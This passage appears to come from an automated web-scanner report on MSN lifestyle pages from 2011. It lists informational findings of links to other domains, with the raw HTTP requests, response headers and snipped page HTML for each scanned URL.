<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660832&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-home%2Fcleaning-organizing%2Fstaticslideshowrs.aspx%3Fcp-documentid%3D27433532%26gt1%3D32026&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24">SAG awards</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24">kim kardashian</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24">next superman</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24">kacey jordan</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li class="first"><a href="http://msn.delish.com/">Food & Entertaining</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.realsimple.com/"><img src="http://blstb.msn.com/i/10/636B99ABA65788BD6D130E0BB1AEB.jpg" width="70" height="30" alt="Real Simple" />
...[SNIP]...
<li class="first"><a href="http://www.realsimple.com/new-uses-for-old-things/new-uses-baking-soda/baking-soda-metal-polish-10000001123016/index.html ">New Uses for Baking Soda</a>
...[SNIP]...
<li class=""><a href="http://www.realsimple.com/new-uses-for-old-things/new-uses-cleaning/aluminum-foil-glassware-scrubber-10000001154428/index.html">Surprising Cleaning New Uses</a>
...[SNIP]...
<li class=""><a href="http://www.realsimple.com/new-uses-for-old-things/new-uses-cooking/straw-as-ketchup-unclogger-00000000049956/index.html">Cooking New Uses for Old Things</a>
...[SNIP]...
<li class=""><a href="http://www.realsimple.com/new-uses-for-old-things/new-uses-dryer-sheets/new-use-dryer-sheets-00000000013069/index.html">New Uses for a Dryer Sheet</a>
...[SNIP]...
<li class="last"><a href="http://www.realsimple.com/new-uses-for-old-things/new-uses-baking/paper-doily-as-a-cake-decoration-00000000051677/index.html">New Baking Uses for Old Things</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx?cp-documentid=27433532&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
<li><a href="http://www.delish.com/cooking-shows/food-tv/super-bowl-sunday-recipes-nfl">NFL Mom's High-Scoring Recipes </a>
...[SNIP]...
http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx?cp-documentid=27433532&gt1=32026&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
/lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx?cp-documentid=27433532&gt1=32026&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xdt_DpwJJY0u0ZM1FdwkLHE4Hhqs4sPvs?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
<div id="subfoot"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js."></script>
...[SNIP]...

17.126. http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-life/family-fun/staticslideshowrs.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx?cp-documentid=20523319&gt1=32033

The response contains the following links to other domains:

http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/share
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
http://www.realsimple.com/?xid=msn-rs
http://www.realsimple.com/beauty-fashion/real-steals-february-00000000008107/?xid=msn-rs-kids-0609
http://www.realsimple.com/food-recipes/shopping-storing/food/ways-save-groceries-10000001735307/?xid=msn-rs-kids-0609
http://www.realsimple.com/health/fitness-exercise/workouts/secret-better-workout-10000001573089/?xid=msn-rs-kids-0609
http://www.realsimple.com/home-organizing/new-uses-for-old-things/28-uses-for-every-day-items-00000000007991/index.html?xid=msn-rs-kids-0609
http://www.realsimple.com/home-organizing/organizing/more-rooms/organized-home-00000000013879?xid=msn-rs-kids-0609
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660833&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-life%2Ffamily-fun%2Fstaticslideshowrs.aspx%3Fcp-documentid%3D20523319%26gt1%3D32033&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-life/family-fun/staticslideshowrs.aspx?cp-documentid=20523319&gt1=32033 HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ea4fa18aa7104d4e8b45e36f206145bf; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C5FCBC06FC7A426EA7B82A66128041BA; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660833&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-life%2Ffamily-fun%2Fstaticslideshowrs.aspx%3Fcp-documentid%3D20523319%26gt1%3D32033&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24">SAG awards</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24">kim kardashian</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24">next superman</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24">kacey jordan</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.realsimple.com/?xid=msn-rs"><img src="http://blstb.msn.com/i/10/636B99ABA65788BD6D130E0BB1AEB.jpg" width="70" height="30" alt="Real Simple" />
...[SNIP]...
<li class="first"><a href="http://www.realsimple.com/health/fitness-exercise/workouts/secret-better-workout-10000001573089/?xid=msn-rs-kids-0609">The Secret of a Better Workout</a>
...[SNIP]...
<li class=""><a href="http://www.realsimple.com/food-recipes/shopping-storing/food/ways-save-groceries-10000001735307/?xid=msn-rs-kids-0609">6 Ways to Save on Groceries</a>
...[SNIP]...
<li class=""><a href="http://www.realsimple.com/beauty-fashion/real-steals-february-00000000008107/?xid=msn-rs-kids-0609">Real Steals in Active Wear</a>
...[SNIP]...
<li class=""><a href="http://www.realsimple.com/home-organizing/new-uses-for-old-things/28-uses-for-every-day-items-00000000007991/index.html?xid=msn-rs-kids-0609">28 Uses for Everyday Items</a>
...[SNIP]...
<li class="last"><a href="http://www.realsimple.com/home-organizing/organizing/more-rooms/organized-home-00000000013879?xid=msn-rs-kids-0609">The Organized Home</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx?cp-documentid=20523319&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
;" href="http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx?cp-documentid=20523319&gt1=32033&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
f="http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx?cp-documentid=20523319&gt1=32033&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

17.127. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-life/new-year-new-you/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx?cp-documentid=25037350&gt1=32060

The response contains the following links to other domains:

http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://download.live.com/?sku=messenger
http://img.widgets.video.s-msn.com/js/embed.js
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://privacy.hearstmags.com/
http://subscribe.hearstmags.com/circulation/esquire/images/esq_cvr-reg.jpg
http://subscribe.hearstmags.com/circulation/esquire/images/esq_msnemb01T_a_brand.jpg
http://subscribe.hearstmags.com/circulation/esquire/images/esq_msnemb01T_h_more.gif
http://subscribe.hearstmags.com/circulation/esquire/images/esq_msnemb01T_u.gif
http://subscribe.hearstmags.com/circulation/shared/images/omn_x.gif
http://subscribe.hearstmags.com/circulation/shared/scripts/validate-functions.js
http://subscribe.hearstmags.com/circulation/shared/scripts/validate-generic.js
http://twitter.com/share
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24
http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24
http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.esquire.com/?link=lgo&dom=msn&tpc=Other&src=syn&con=art&mag=esq
http://www.esquire.com/features/75-things-0808?link=msn%3A75%20Things%20to%20Do%20Before%20You%20Die%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq
http://www.esquire.com/features/movies/best-movies-ever-0609?link=msn%3AThe%20Best%20Movies%20of%20All%20Time%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq
http://www.esquire.com/the-side/video/dr-oz-workout-0509?link=msn%3AGet%20Thin%20in%207%20Minutes%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq
http://www.esquire.com/women/10-things-you-dont-know-about-women/relationship-advice-for-men?link=msn%3AImportant%20Things%20Men%20Don%27t%20Know%20About%20Women%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq
http://www.esquire.com/women/funny-joke-from-a-beautiful-woman/hot-actress-photo-gallery-070909?link=msn%3AFunny%20Jokes%20from%20Beautiful%20Women%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq
http://www.hearstmags.com/
http://www.marthastewart.com/photogallery/microsoft-custom-templates
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660834&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-life%2Fnew-year-new-you%2Farticle.aspx%3Fcp-documentid%3D25037350%26gt1%3D32060&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://subscribe.hearstmags.com/subscribe/splits/esquire/esq_f_gift
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a5c365d7ad954651995abaae8ffc7b1f; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AD63D15A3A274331A57D7FA218EC5153; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 42411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
